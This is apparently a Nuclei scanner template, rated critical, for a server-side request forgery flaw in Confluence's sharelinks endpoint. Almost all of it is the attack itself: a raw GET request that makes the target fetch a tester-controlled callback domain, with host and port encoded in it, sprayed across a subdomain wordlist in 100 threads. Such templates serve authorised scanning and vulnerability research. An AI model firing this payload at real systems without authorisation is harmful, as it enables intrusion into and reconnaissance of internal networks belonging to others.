id: Confluence-SSRF
info:
  name: Confluence SSRF
  author: 0xAwali
  severity: critical
  description: Confluence SSRF via Sharelinks , Commonly Bound Ports 80 - 443 - 8080 - 8443
  reference: https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#confluence
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |-
        GET /rest/sharelinks/1.0/link?url=https://{{Host}}.{{Port}}.{{Subdomains}}.Confluence.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
        Accept: */*
        Accept-Language: en-US,en;q=0.9
